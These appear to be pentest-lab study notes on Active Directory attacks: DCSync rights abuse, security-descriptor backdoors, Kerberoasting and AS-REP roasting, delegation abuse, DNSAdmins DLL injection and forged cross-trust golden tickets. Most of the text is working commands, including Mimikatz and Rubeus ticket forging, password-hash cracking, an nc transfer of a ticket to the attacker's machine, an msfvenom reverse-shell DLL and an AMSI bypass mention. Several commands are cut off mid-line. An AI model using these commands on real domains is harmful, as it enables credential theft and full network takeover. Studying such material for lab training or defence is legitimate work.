Set-ADAccountPassword -Identity testuser -NewPassword(ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose
DCSYNC:
Three Spicial Right :
it’s enough to DCSync Privileges, this one we can extract NTLM hash without any DA
privileges .
#Add FullControl Rights:

#ActiveDirectoryModule and Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal studentx -Verbose
#Powerview
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName studentx -Rights All -Verbose
#DCSync Rights
#Powerview
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "studentx")
# Add To DCSync Rights
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName <studentx> -Rights DCSync -Ve
#ADModule and Set-ADACL

Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal studentx -GUIDRight DCSync -Verbose
Execute DCSync Without Domain Admin Privileges:
Domain Presistence - ACLs - Security Descriptors

Whene we have local admin privileges on the box it’s possiable to modify the ( Security
Descriptor ) Like:
Owner , primary Group , DACL & SACL) of Multiple remote access Method → Securable objects
to allow access to Non—Admin Users.
SDDL → Security Descriptor Definition Language is Used to describe a Security Descriptor.
SSDL uses ACE strings For ( DACL & SACL )
ACE Strings :
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;(resource_attribute)
# ACE for built-in Administrator For WMI namespaces :
# Example
A;Cl;CCDCLCSWRPWPRCWD;;;SID
A-> Allow
CI-> Container_INHERIT
CCDCLCSWRPWPRCWD-> All of these are defferent rights , all of these club together give fullControl over the namespace .
if i Replace SID With ( UserSID ) the user will have full control over the namespace
Reference
#Get List Information Using WMI from DC:

Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local
But when we don’t have any ACE on User :
ACLs Can be modified to Allow Non-Admin users access to Securable

Objects:
Note: We Must run this script as Domain Admin
# On Local machine for <USER>

Set-RemoteWMI -UserName <USER> -Verbose -> # For add all the namespace
# On remote machine for <USER> without Explicit Credentials.
Set-RemoteWMI -UserName <USER> -ComputerName <DC> -namespace 'root\cimv2' -Verbose -> # Select A specific NameSpace
After add ACL for namespace we can execute again:
Use PowerShell Remoting → Set-RemotePSRemoting.ps1
# On local machine for <USER>

Set-RemotePSRemoting -UserName <USER> -Verbose
# On remote Machine for <USER> without Cred
Set-RemotePSRemoting -UserName <USER> -ComputerName <DC> -Verbose
# On Remote Machine , Remove the permissions
Set-RemotePSRemoting -UserName <USER> -ComputerName <DC> -Remove
After Run this command We Can execute PS remote Command :
Invoke-Command -ScriptBlock{whoami} -ComputerName dcorp-dc.dollarcorp.
Security Descriptor - Remote Registry
#Using DAMP , with Admin privs on remote machine

Add-RemoteRegBackdoor -ComputerName <DC> -Trustee <USER> -Verbose
Load DAMP with Domain Admin Privs
Now Run this command on Domain Admin :
Add-RemoteRegBackdor -ComputerName dcorp-dc -Trustee studentadmin -Verbose
Now on studentadmin machine run this command :
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

# Get Machine Account Hash
# Get Local Account Hash

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
#Get Domain cached credentials
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
Priv Esc - Kerberoasting → Decrypt Pass

Kerberoasting allows a user to request a service ticket for any service with a registered
SPN then use that ticket to crack the service password. If the service has a registered SPN
then it can be Kerberoastable however the success of the attack depends on how strong the
password is and if it is trackable as well as the privileges of the cracked service
account.
The service accounts can be linked to hosts like computers (CN=Computers) or domain users
(CN=Users). Each service account can be mapped to a set of running services like MSSQL,
Web, SharePoint, File shares, Exchange services, etc., within the domain known as Service
Principal Names (SPNs).
📍Service Principal Name maps the host/user service accounts to running services.
The structure of an SPN consists of 2 main parts: Service Class:the service type,
i.e., SQL, Web, Exchange, File,etc., and the Host
where the service is usually running in the format of FQDN (FullyQualified Domain Name)
and port number. For example, below, the Microsoft SQL service runs on the dcorp-mgmt host on
port 1443
The SPN is MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
Kerberoasting
works best against user service accounts configured with weak passwords, not the host-based
computer accounts that use random 128 character passwords that are changed every 30 days.
🎯 The attack’s goal is to retrieve the cleartext passwords of service accounts to either
escalate our privileges since most service accounts run with admin-related privileges or
pivot laterally within the network.
🚩$_Attack_Pre-requisites
Credentials of a valid domain user service account (not a computer account).
Service Principal Names of the services tied to the service user account.
Service ticket (TGS) for the running service.
Note the vulnerable domain member - a user account with servicePrincipalName attribute set,
which is very important piece for kerberoasting - only user accounts with that property set
are most likely susceptible to kerberoasting:
First need to identify all the running services mapped to the service account and their
privileges through the SPN attribute.
Attacker enumerating user accounts with serverPrincipalName attribute set:
#PowerView
Get-NetUser -SPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
#ActiveDirectory Module
Get-ADUser -Filter {ServicePrincipleName -ne "$null"} -Properties ServicePrincipleName
# Using only built-in powershell, we can extract the susceptible accounts with:
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"
#It would have been better to use the following command because of the -filter usage (quicker than select-object)
get-adobject -filter {serviceprincipalname -like “*sql*”} -prop serviceprincipalnam
Additionally, user accounts with SPN set could be extracted with a native windows binary:
setspn -T offense -Q */*
Attacker requesting a kerberos ticket (TGS) for a user account with servicePrincipalName set to
depend on the output - it gets stored in the memory:
# Request a TGS .
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "{ServicePrincipleName}"
#PowerView
Request-SPNTicket
klist → check if the TGS has been granted
Using mimikatz, the attacker extracts kerberos ticket from the memory and exports it to a
file for cracking:
Invoke-Mimikatz -Command '"kerberos::list /export"'
Now i will use a nc to transfare the hash to my machine
# On my Machine :
nc -lvp 443 > ker.bin
# On the target machine
nc <ip> <port> < [PATH_Of_The_Hash]
Cracking the Ticket :
# Using tgsrepcrack.py
python tgsrepcrack.py <PASS_LIST> ker.bin // Recomended use list -> 10k-worst-pass.txt
# Using hashcat
Reference
Observations
Below is a security log 4769 showing service access being requested:
If you see Add-event -AssemblyName SystemIdentityModel
(from advanced Powershell logging) followed by a windows security event 4769 immediately
after that, you may be looking at an old school Kerberoasting, especially if ticket
encryption type has a value 0x17 (23 decimal, meaning it's RC4 encrypted):
Traffic
elow is the screenshot showing a request being sent to the Ticket Granting Service (TGS) for the
service with a servicePrincipalName HTTP/dc-mantvydas.offense.local :
Priv Esc - Kerberoasting - AS-REPs - SPN
First of All , What is AS-REPs?
AS-REP is a Kerberos message type that refers to an "Authentication Service" (AS) response
message. It is transmitted between a kerberos server and client as part of the exchange of
credentials needed to access a service.
More Information
What is AS-REP roasting?

is a technique that allows retrieving password hashes for users that have Do not require Kerberos
preauthentication property selected:
With sufficient rights (GenericWrite or GenericAll), Kerberos preauth

can be forced disabled as well.
Enumerate Accounts with Kerberose Preauth Disable
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose
So , i Got Two Account The Kerberose Preauth was Disable:
Note: i use Attacking Kerberose Machine From TryHackMe!
Force Disable Kerberose PreAuth
# Checking current groups ACL rights:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
# Disabling kerberos pre-auth for a user:

Set-DomainObject -Identity <USERNAME> -XOR @{useraccountcontrol= 4194304 } –Verbose
4194304 → DONT_REQ_PREAUTH
Get the Hashes of all
i’ll to use Rubeus.exe

Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH]
# Crack with hashcat
hashcat asreproast.txt -m 18200 /usr/share/wordlists/rockyou.txt --force
Or Crack the hash with jonh
john --format:krb5asrep asrep.txt --wordlist=/usr/share/wordlist/rockyou.txt
Or i can get hash of user by ASREPRoast:
# Use ASREPRoast:
Get-ASREPHash -UserName VPN1user -Verbose
# Do all automatically:
Invoke-ASREPRoast -Verbose
# Crack using John

./john vpn1user.txt --wordlist=wordlist.txt
SET SPN
With enough rights (GenericAll/GenericWrite), a target user's SPN can be set to anything
(unique in the domain).
We can then request a TGS without special privileges. The TGS can then be "Kerberoasted".
PowerView_dev
# Viewing our ACL permissions:

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
# Check if user has SPN:

Get-DomainUser -Identity supportuser | select serviceprincipalname
ADModule
# Check if user has SPN already:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
Setting SPN (must be unique for domain)PowerView / SharpViewADModule1
PowerView_dev
Set-DomainObject -Identity USER -SET @{serviceprincipalname='ops/whatever1'}
## Clean up
Set-DomainObject -Identity USER -clear serviceprincipalname
ADModule
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}
After Set SPN:
Extraction and cracking same as kerberoasting.
Request a ticket
Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"
klist
Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
Brute-force the password
python.exe .\tgsrepcrack.py .\10k-passwords.txt '.\2-40a10000-student1@ops~whatever1-dollarcorp.moneycorp.LOCAL.kirbi'
Priv Esc - Kerberos Delegaion

What is the Delegation?
Delegation is the act of giving someone authority or responsibility to do something on
behalf of someone else.
‫ ﻳﻌﻄﻲ ﺷﺨﺺ ﺻﻼﺣﻴﻪ او ﺳﻠﻄﻪ ﺑﺎﻟﻨﻴﺎﺑﻪ ﻋﻦ ﺷﺨﺺ ﺛﺎﻧﻲ‬.
In the Active Directory,

is a feature that enables specific accounts ( user or computer ) to impersonate other accounts to
access particular services on the network.
🟥 Types of Delegations allowed with Kerberos:

1. Uncostrained → General/Basic.
2. Constratind.
3. Resource-based Constrained delegations.
Unconstrained:
Allows the first hop server ( web server in Example ) to request access to any service on
any computer in the domain.
1. User Authenticate to DC
2. DC return TGT
3. User Request TGS for a web Service
4. DC provides the TGS
‫ﺗﻤﺎﻣﺎ ﻣﺜﻞ ﻋﻤﻞ اﻟﻜﻴﺮﺑﻴﺮوس اوﺛﻴﻨﺘﻜﻴﺸﻦ‬
5. User send TGT & TGS to web server ( User TGT is also embeded inside TGS ) ‫وﻫﻨﺎ ﻓﻜﺮه اﻟﺪﻳﻠﻴﺠﻴﺸﻦ‬
6. Web Server service account Use user TGT to request a TGS for DB server from the dc
7. Web Server Service Account connects to database server AS user
🔴 Important
The TGT is extracted from TGS and Stored in LSASS, This way the server
can reuse the user’s TGT to access any other resource as The user
#PowerView;
Get-NetComputer -Unconstrained
#ADModule;
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
In this output;
dcorp-dc → by always show up unConstrained Delegation enable, so Skip it.
dcrop-appsrv → We Will Focus on this machine.
🚩Attack Requirements:
1. a User Or Computer account with Delegation option enabled (dcrop-appsrv)
2. Local Admin Privileges on the Delegated compromised host:
we need compromise the server(s) where Unconstrained delg is enabled.

So, We Need Machine that have Local Admin Priv :
sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /ntlm:d549831a955fee51a43c83efb3928fa7 /run:powershell.exe
And then inside appadmin machine check wither computer have local admin access:
Find-LocalAdminAccess
Niiice i found this machine have LocalAdminAccess And also UnConstrained Deleg
Via appsrv machine we can extract any user TGT on appsrv machine
#Inside appadmin box

# Create session appsrv
$sess = New-PSSession -ComputerName dcorp-appsrv.dollarcorp.moneycorp.local
# Load MimiKatz on This machine appsrv
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimikatz.ps1 -Session $sess
So, It’s Detected By AMSI, We need to bypass it
# Enter-PSSession
Now Load the script:
Export all Avalible Ticket on this machine appsrv
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' -> # /export save into disk
ls | select name
appadmin , appsrv are not interesting, so let’s wait for any interesting ticket to be present
# Use Invoke-UserHunter Pull -> To Catch the Ticket from any user that make some operation
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
We’ll wait for any session from Administrator
Now do again Invoke-Mimikatz -Command '“sekurlsa::tickets /export”'
And Boom We Got it
So Now Use Mimikatz to passTheTicket:
Invoke-Mimikatz -Command '"kerborse::ptt <name_of_ticket>"'
Now This way help us to escalate domain admin from uncostrained delegation.
Constrained:
( Specified Services on Specified Computers )
If you have compromised a user account or a computer (machine account)

that has kerberos constrained delegation enabled, it's possible to
impersonate any domain user (including administrator) and authenticate
to a service that the user account is trusted to delegate to.
Allows the account with The “Trust this user/Computer for delegation to specified services only” enabled
to impersonate ANY user to access Specific service listed in the allowble delegation list
As seen below in Figures 1 and 2 , delegation properties are set for

specific service types and hosts (Service Principal Names - SPNs) for user
or computer accounts.
This configuration of a constrained delg for a USER
This configuration of a constrained delg for a Computer
So , This type of delegation gives a massive responsibility to the front-end services to

authenticate the user. In this case, the user doesn’t authenticate to the Kerberos domain controller (KDC)
directly . Instead, it will authenticate to the service first, then the service
impersonates the user to access the requested resource.
🔴 Note
User Must get a valid TGT to request TGS, So How to get valid TGT?
1. Initially sending a timestamp which is encrypted and sign with NTLM hash of the user
password
To impersonate the user, Service For user ( S4U ) extension is used

which provides two extensions:
Kerberos Protocol does this type of delegation with two (2)
extensions:
1. • Service for User to Self (S4U2Self) — Kerberos protocol transition extension. →
a. Service request TGS for it’s self from the DC without supplying the password
b. Service account must have the → TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D)
UserAccessControl (UAC) Attribute.
c. Allows a service to obtain a forwardable TGS to itself on behalf of a user.
i. just with the user principal name without supplying password.
2. • Service for User to Proxy (S4U2Proxy) — Kerberos Constrained Delegation extension.
a. Allows a service to obtain a TGS to a second service on behalf of a user.
i. Because this is constrained Delegation that’s mean → it cannot be request a

TGS by any service it must be some specific service That is controlled by :
msDS-AllowedToDelegateTo Attribute. this contain list of SPNs to which the user
tokens are TGS can be forwarded
Authentication Flow:
Step 2,3 allowes the web server to obtain a TGS for it self as Joe User ( impersonate
joe )
Step 5,6 KDC check the value of msDS-AllowedToDelegateTo if it’s matches CIF/dcorp-mssql on the
websvc account if it matches the CIF/dcorp-mssql then KDC will return the TGS for dcorp-
mssql as joeuser.
dcrop-mssql ‫ﻋﻠﻰ ﺟﻬﺎز‬ CIF ‫ﻫﻨﺎ اﻻﺣﻆ ان اﻟﺘﻜﺖ اﻟﻠﻲ اﺧﺬﺗﻬﺎ ﻓﻘﻂ ﻋﻠﻰ ﺧﺪﻣﻪ وﺣﺪه وﻫﻲ‬
Unconstrained ‫و‬ Constrianed ‫وﻫﺬا ﻳﻮﺿﺢ ﻟﻲ اﻟﻔﺮق ﺑﻴﻦ اﻟـ‬
To Abuse the constrained delegation in above scenario, we need to have access to the
websvc account.if we have access to that account, it’s possible to access the service
listed in msDS-AllowedToDelegateTo of the websvc account as ANY user.
🚩Attack Requirements:
a User Or Computer account with Delegation option enabled:
“Trust This user/computer for delegation to specified service only”
Local Admin Privileges on the Delegated compromised host:
“If you compromised the server as a regular user, you need to esclate to admin to abuse this delegation feature.”
# Enumerate users and computers with constrained delegation enabled

# PowerView ( dev )
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# PowerView
Get-NetUser -TrustedToAuth
Get-NetComputer -TrustedToAuth
# ADModule
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Two Object Name:
1. Name → websvc , Service → CIFS
2. Name → DCORP-ADMINSRV , Service → time
So websvc just delegate to CIFS
And DCORP-ADMINSRV delegate to time
PowerView_dev
💥 Time to abuse this account and get the privilege:

So before we access to dcorp-adminsrv box so we can use the NTLM hash or plaintext password .
OR
asktgt from kekeo, we request a TGT ( steps 2 & 3 in the digram ).
kekeo# tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /rc4:cc098f204c5887eaa8253e7c2749156f
Kekeo is a tool that read and write ticket on LSASS without injected to LSASS
Now when we have a TGT we request a TGS using s4u from kekeo (step 4&5)
tgs::s4u /tgt:<PATH_OF_TICKET> /user:Administrator@dollarcorp.moneycorp.local /service:cifs-dcorp-mssql.dollarcorp.moneycorp.l
websvc ‫ﺗﻜﻮن ﻃﺎﻟﺒﻬﺎ ﻣﻦ اﻟﻴﻮزر‬ tgt ‫ﻫﻨﺎ اﺧﺘﺮت اﻟﻴﻮزر ادﻣﻦ او اي ﻳﻮزر ﺑﺸﺮط‬
Delegate_user ‫وﺑﻌﺪﻳﻦ ﺣﻄﻴﺖ اﺳﻢ اﻟﺴﻴﺮﻓﺲ اﻟﻠﻲ ﺗﺴﻤﺢ ﻟﻞ‬
Now we use a Mimikatz to inject the TGS ticket and whoooa we got it:
Invoke-Mimikatz -Command '"kerberos::ptt <Name_File_Of_Ticket_TGS>"'
Now We can access just the file system on dcorp-mssql machine.
ls \\dcorp-mssql.dollarcorp.moneycorp.local\c$
But we cannot execute any other protocol for dcorp-mssql Like

Get-WmiObject or Enter-PSSession we got access denied.
So What we can do after this ?
We can Actually access althoughs services on machine which run under the same account,
There is no validation for The SPN specified.
that’s mean → if we have delegation for CIFS on dcorp-mssql we can access all those
services which use the same user account as CIFS .
This is huge as it allows access to many interesting services when

the delegation may be for a non-intrusive service!
When we Enumerated for a A delegation users we have another machine it’s called ⇒ dcorp-
adminsrv So Request A TGS for another machine

We Have a NTLM Hash of adminsrv before.
After request a TGT we request a TGS but here is a differince:
So Here we not just access to time, we can access to ldap on DC as Administrator

impersonate that administrator.
That’s mean we Can Run Attack “DCSync” without having domain admin priv
for our current user.
# Request a TGT
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:1fadb1b13edbc5a61cbdc389e6f34c67
# Request a TGS ticket

tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi
We rquesting as Administrator a ticket not only time and also ldap service
‫ﻟﻮ ﺗﻼﺣﻆ ﻫﻨﺎ ﻣﺎﻋﻨﺪي وﺻﻮل ﻟﺨﺪﻣﻪ ﺛﺎﻧﻴﻪ ﻟﻜﻦ ﻋﻦ ﻃﺮﻳﻖ اﻟﺠﻬﺎز اﻻول ﻗﺪرت اوﺻﻞ ﻻﻛﺜﺮ ﻣﻦ ﺧﺪﻣﻪ ﻋﻠﻰ اﻟﺠﻬﺎز اﻟﺜﺎﻧﻲ‬
‫ك ادﻣﻦ‬.
Now Injected By mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~dcorpdc.

Invoke-Mimikatz -Command '"lsadump::dcsync/user:dcorp\krbtgt"'
To abuse constrained delegation for dcorp-adminsrv$ using Rubeus , we

can use the following command ( We are requesting a TGT and TGS' in a
single command ):
.\Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:1fadb1b13edbc5a61cbdc389e6f34c67 /impersonateuser:Administrator /msdsspn:"time/dco
After injection, we can run DCSync:
Priv Esc - DNSAdmins

Very Interesting Privilege escalation, by abusing privilege's of the DNSAdmin group.
This method can be used when we have access to user account who happens to be a member of
DNSAdmins group or when the compromised user account has write privileges to a DNS server
object. So it has a capability to load arbitrary DLL with the privileges of dns.exe (SYSTEM
level privileges).
You can check if a user is in DNSAdmins group by using the command:
net user <userName> /domain

e.g => net user spotless /domain
if the output contains DNSAdmins in it’s group memberships, then the user belongs to the
group and we can abuse his membership to escalate to Administrator rights.
if we have access to the member in DNSAdmin group we can run a dll that is run our code to
execute something else like: reverse shell with system privileges.
Note: DNSAdmin Group Must Have privileges to Restart the DNS service.
Note: the default configuration will not allow restarting the server.
Now We need to enumerate the members of the DNSAdmin Group:
# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"
# OR
Get-NetGroupMember DNSAdmins
Now we need to compromise a member , we Already have the hash of srvadmin beacuse of
derivative local admin.
We will build a DLL which contains reverse tcp code and inject it into dns.exe process on the victim’s DNS Server
(DC) . In case your work requires building a DLL which exports all necessary functions refer
this post or this screenshot
for building the DLL instead of msfvenom. You can also use remote dll injector.
Building The DLL:

we need to build a DNS plugin DLL that we will be injecting into a dns.exe process on a
victim DNS server (DC). Below is a screenshot of the DLL exported functions that are
expected by the dns.exe binary when loading a plugin DLL. I have also added a simple system
command to invoke a netcat reverse shell once the plugin is initialized and code is
executed.
I then tested the function with rundll32 as shown below, which returned a reverse shell to
my attacking machine - code gets executed, shell gets spawned:
rundll32.exe .\dnsprivesc.dll,DnsPluginInitialize
Building the DLL using msfvenom:
While building a payload you have to take the target machine’s architecture in consideration
too(X86/x64).
One thing i learnt during this pentest lab was that meterpreter shells
are blocked by Antivirus/Windows Defender, to be specific, the staged
ones . The difference between staged and stageless payloads are described
in detail in this rapid7 post.
I later found that stageless payloads have limitations which do not allow dll injections
for now,it can be tracked in this GitHub issue.So i decided to go for more simple payloads
without meterpreter . My victim had a 64 bit arch , so i generated a dll with the following command,
msfvenom -a <ARCH> -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <TYPE_FILE>

#eg
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f dll > privesc.dll
Hosting the payload:

Once the payload is generated, we have to find a way to access the payload in victim’s
machine. There are plenty of ways to transfer files to windows from Linux, but in this
case, we will use smb server to host the file .
We are choosing this, because windows supports UNC paths and samba shares by default in
most cases. Also, there are times when the victim’s AV or defender may delete the payload
if uploaded, so we’ll stick with smb server for this one. However dealing with smb can be
quite tricky on *nix, but luckily we have scripts that can make the process a lot easier.
We will use Impacket’s smb server, to host our file.
sudo python smbserver.py <shareName> <path/of/share>

eg: sudo python smbserver.py share ./
You can check if the server is working by using smbclient on a new terminal,
smbclient -L your_smb_server_ip --no-pass
# (assuming you didn't set username and password)
eg: smbclient -L 192.168.43.100 --no-pass
you can also check if the victim is able to access the share using the following command on
victim’s shell,
net view \\your_smb_server_ip

#eg: net view \\192.168.43.100
As you can see accessing smb share is really easy by using UNC paths.
for example, to access our privesc.dll, we can simply use the following
UNC path \\192.168.43.100\share\privesc.dll
Abuse DNS with dnscmd:

🔴 Now that we have the DLL and we checked that it is working
to load our malicious DLL (from the victim controlled network share on host 10.0.0.2) next
time the service starts (or when the attacker restarts it):
dnscmd dc01 /config /serverlevelplugindll \\10.0.0.2\tools\dns-priv\dnsprivesc.dll
is a windows utility that allows people with DnsAdmins privileges

dnscmd
manage the DNS server. The utility can be installed by adding DNS Server
Tools to your system as shown in the below screengrab
Resource → https://www.ired.team/offensive-security-experiments/active-directory-kerberos-
abuse/from-dnsadmins-to-system-to-domain-compromise
From the privileges of DNSAdmins Group Member, Configure DLL using

dnscmd.exe
( needs RSAT DNS ) ⇒ Remote Server Administration tools are required
dnscmd <FQDN of DC> /config /serverlevelplugindll \\UNC_path_For_DLL

# eg
dnscmd dcorp-dc /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll
Normally we cannot check if the dll was added, as it requires Administrator privileges, but in our
case we did have an admin account , so we can check using the following command,
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
Listening for connection and restarting dns if required:
We can use a normal listener like nc for listening on the proper port. In case you don’t
get a connection, you can try restarting the dns server on your own. this is possible
because the victim is part of DNSAdmins group.
Listener: nc -lvnp 4444
#For restarting the server

sc.exe <FQDN of DC> stop dns
sc.exe <FQDN of DC> start dns
And that’s it, you should have a shell with Administrator privileges by
now.
C:\>whoami
nt authority\system
Right click on dll folder → Properites → Sharing → Share → choose Everyone For read/Write
Get a powershell on srvadmin user:
and run this command :
it load the dll inside DNS service in the DC.
We need to restart the service :
sc \\dcorp-dc stop dns

sc \\dcorp-dc start dns
Event ID ⇒ 770: that means dll it’s loaded to DNS service
there is a new file call : kiwidns in System32 dir.

By Default, the mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log
We can use a system function to execute a Reverse shell encoded by PowerShell encoded or
what ever you want:
Priv Esc - Across Trusts ( Cross Trusts Attacks ) Same

Forest.
Domains in same forst have an implicit two-way trust with other domains.
There is a trust key between the parent and child domains.
there are two ways of escalating privileges between two domains of same forest:
1. krbtgt hash
2. Trust Tickets
Child to Parent Trust Flow:
1. Request TGT, Time stamp encrypted with NTLM hash user
2. DC Check it and Response a TGT
3. Show The TGT and Request The TGS,
4. Request the TGS for application server in the parent domain, DC Check the global catalog
and find server that this service is not in it’s domain it’s in the parent domain, the DC response
within inter-realm TGT or Referral Ticket .
5. That Inetr-realm TGT is now present in that to DC of the Parent Domain
The Only Validation the Parent DC does in this case:
if it can decrypt the Inter-realm TGT.
What is the secret which is used to encrypt this inter-realm TGT?
That is a Trust Key
Can The Parent Domain Controller Decyrpted?
Yes, it’s also has the copie of trust key.
Which Steps is Most scrotion one?
Step Five because it’s present inter-realm TGT and response the TGS
(Because we want to enter inside another domain in same forest 😉)
it’s this step is abusable in this case, That Mean if we have access to trust key we can
forge and inter-realm TGT which the parent DC would assume to be valid.
Another Example:
1. The user authenticates to DC#1 by sending an encrypted request with their

credentials ( TimeStamp + NTLM HASH ). The DC#1 verifies their identity and sends
a TGT ticket.
2. The user receives the TGT ticket and sends it back to DC#1,requesting a
service ticket for a specific service like SQL service.If the requested service
resides on another domain ( Parent Domain ) DC#1 will issue a special TGT ticket
called
inter-realm or Referral Ticket Encrypted with their trust key to refer to the DC that has
the service.
In our case, the user requested access to a SQL service that resides
on DC#2.So, DC#1 issued a referral ticket to DC#2.
3. The user takes that inter-realm ticket and presents it to DC#2,requesting a SQL service
ticket. DC2# has a copy of the trust key of DC#1; if it decrypts the ticket presented
by the user, it will go ahead and issue a SQL service ticket as requested without
conducting additional verification.
📌 DC#2 will blindly trust DC #1 to verify the user. However, we will see the risk later
in the escalation part that if the attacker obtains the trust keys, can forge TGT
tickets all day long.
4. The user present the SQL TGS ticket to the database server and gets the intended
access.
$_Escalation_Requirements 🚩
Domain Admin Privileges on the compromised DC.
DC Trust Keys to forge the Inter-realm TGT Tickets
$_Used _Tools 🔧
Invoke-Mimikatz
Rubeus
$_Escalation_Demo 🔥 DA⇒EA
Our goal is to forge an inter-realm trust ticket that escalates us to Enterprise Admin using
the compromised trust keys. This step assumes that you have already gained domain admin
privileges on the DC.
I obtained the access by abusing the application server’s
unconstrained delegation in the previous post
To forge a trusted ticket, we need the domain trust key and the SID of the root domain.
Run Invoke-Mimikatz with the trust parameter to obtain the keys.
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc-name

# OR
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcrop\mcorp$"' #mcorp -> netbios Name of Parent Domain
As seen in the below screenshot, we obtained all the trust keys from the domain
controller. The [IN] and [OUT] in front of the domain names indicate the trust direction.
In our case, we are interested in getting access to the root domain “moneycorp.local”
from our child domain “dollar.moneycorp.local” . Therefore, we choose the first key.
[ In ] DOLLARCORP .MONEYCORP.LOCAL -> MONEYCORP.LOCAL
After identifying the right trust key, we need the domain controller SID and the SID of
the root domain to create the fake trust ticket with Enterprise Admin privileges.
💥 Run With DCSYNC:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcrop\mcorp$"' #mcorp -> netbios Name of Parent Domain
Child to Forest Root using Trust Tickets.
An Inter-Realm TGT can Be forged:
Next, run Invoke-Mimikatz to issue the inter-realm tickets. Again, we specify the gold
module, the child domain SID of “dollar.moneycorp.local” and the root domain SID
“moneycorp.local”.
Step one – EA SID

First, we need to collect the Enterprise Admin group SID you don’t need to have any
permission over moneycorp.local :
Get-NetGroup -Domain moneycorp.local -GroupName "Enterprise Admins" -FullData|select objectsid
Step two – Current Domain SID
by using Mimikatz, we can list the domain trust we have and get the SID for each domain
including the current domain
mimikatz(powershell) # lsadump::trust
Current domain: dollarcorp.moneycorp.local (dcorp / SID)
Domain: moneycorp.local (mcorp / SID)
Step three – Collect the krbtgt hash for the child domain
Invoke-Mimikatz -Command '"lsadump::dcsync /user:mcorp\krbtgt"'
Step four – Create Golden Enterprise admin
Invoke-Mimikatz -Command '"Kerberos::golden

/user: Administrator
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID
/sids: Enterprise_Admin_SID
/rc4: Ticket HASH
/service:krbtgt
/target:moneycorp.local [root domain]
/ticket: location to save the ticket"'
Note\ We don’t need Domain Admin Privileges to run this command
Copy the ticket locally, and use it to request a service ticket (TGS) from the root
domain. In the below example, we requested CIFS service with Rubeus — asktgs
module. { Get a TGS for a service ( CIFS ) in the target domain by using the forget
trust ticket.
🔴 Note\ Tickets for other services list ( HOST , RPCSS, WMI, HOST, HTTP for PSremoting,
WinRM ) can be created as well.
Rubeus.exe asktgs /ticket: ticket Location /service: service type [cifs/mcorpdc.moneycorp.local] /dc: domain controller [mcor
# OR
asktgs.exe <PATH_Trust_TKT.kribi> <SERVICE_TYPE> [cifs/mcorpdc.moneycorp.local]
After running the command, verify we have the new TGS ticket with the klist
command
As seen below, we got a TGS ticket as Administrator for the CIFS service on the root
domain controller “mcorp-dc.moneycorp.local” .We were able to list the Enterprise
Administrator’s shares on the root domain.
OR using kirbikator.exe
.\kirbikator.exe lsa .\<Trust_Ticket>

.\kirbikator.exe lsa .\CIFS.mcorp-dc-moneycorp.local.kirbi
# Now Do list the Enterprise Domain

ls \\mcorp-dc.moneycorp.local\c$
So TGS has been injected, and we can access:
